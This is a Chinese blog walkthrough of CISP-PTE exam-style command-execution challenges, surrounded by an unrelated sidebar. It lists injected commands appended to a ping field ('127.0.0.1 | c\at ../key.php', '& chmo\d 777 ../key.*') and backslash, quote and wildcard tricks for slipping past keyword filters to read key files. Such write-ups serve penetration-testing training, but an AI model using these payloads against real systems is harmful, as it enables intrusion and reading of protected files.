当前位置:网站首页>2022 CISP-PTE(三)命令执行
2022 CISP-PTE(三)命令执行
2022-07-03 06:13:00 【Aτθ】
一、第一道
1、题目环境
2、拿key
2.1、获取目录
127.0.0.1 | ls
127.0.0.1 | ls ../
2.2、读取文件
常用命令执行函数:
system("ls");
eval、exec
linux读文件: cat、tac、less、more、head、tail
ca\t、ca''t、cat""t
如果对key.php做了过滤:
key.* k{
e}y.php k?y.php
127.0.0.1 | c\at ../key.php
127.0.0.1 | t\ac ../key.php
第二道
1、题目环境
2、解题步骤
2.1 获取目录
2.2 提升权限
127.0.0.1 & l\s -al ../key.*
127.0.0.1 & chmo\d 777 ../key.*
127.0.0.1 & l\s -al ../key.*
2.3 获取key
127.0.0.1 & t\ac ../key.*
三、第三道
1、题目环境
2、解题步骤
第四道
1、题目环境
2、解题步骤
2.1、ls
2.2、获取key
http://81.70.245.6:50289?c=cat flag.php;
边栏推荐
- Beandefinitionregistrypostprocessor
- Code generator - single table query crud - generator
- Get a screenshot of a uiscrollview, including off screen parts
- Pdf files can only print out the first page
- Disruptor learning notes: basic use, core concepts and principles
- conda和pip的区别
- Understand the first prediction stage of yolov1
- Virtual memory technology sharing
- Use abp Zero builds a third-party login module (I): Principles
- ODL framework project construction trial -demo
猜你喜欢
Oauth2.0 - using JWT to replace token and JWT content enhancement
How to scan when Canon c3120l is a network shared printer
剖析虚幻渲染体系(16)- 图形驱动的秘密
Analysis of Clickhouse mergetree principle
The most responsible command line beautification tutorial
Read blog type data from mysql, Chinese garbled code - solved
Multithreading and high concurrency (7) -- from reentrantlock to AQS source code (20000 words, one understanding AQS)
SQL实现将多行记录合并成一行
Understand the first prediction stage of yolov1
Skywalking8.7 source code analysis (II): Custom agent, service loading, witness component version identification, transform workflow
随机推荐
Use abp Zero builds a third-party login module (I): Principles
Kubernetes notes (VII) kuberetes scheduling
Analysis of Clickhouse mergetree principle
冒泡排序的简单理解
Mysql database table export and import with binary
In depth analysis of kubernetes controller runtime
Fluentd is easy to use. Combined with the rainbow plug-in market, log collection is faster
智牛股项目--04
【C#/VB.NET】 将PDF转为SVG/Image, SVG/Image转PDF
项目总结--2(Jsoup的基本使用)
Understand expectations (mean / estimate) and variances
Kubernetes notes (I) kubernetes cluster architecture
JMeter performance automation test
JDBC connection database steps
Judge whether the date time exceeds 31 days
Redis cluster creation, capacity expansion and capacity reduction
Various usages of MySQL backup database to create table select and how many days are left
POI dealing with Excel learning
Migrate data from Mysql to tidb from a small amount of data
Docker advanced learning (container data volume, MySQL installation, dockerfile)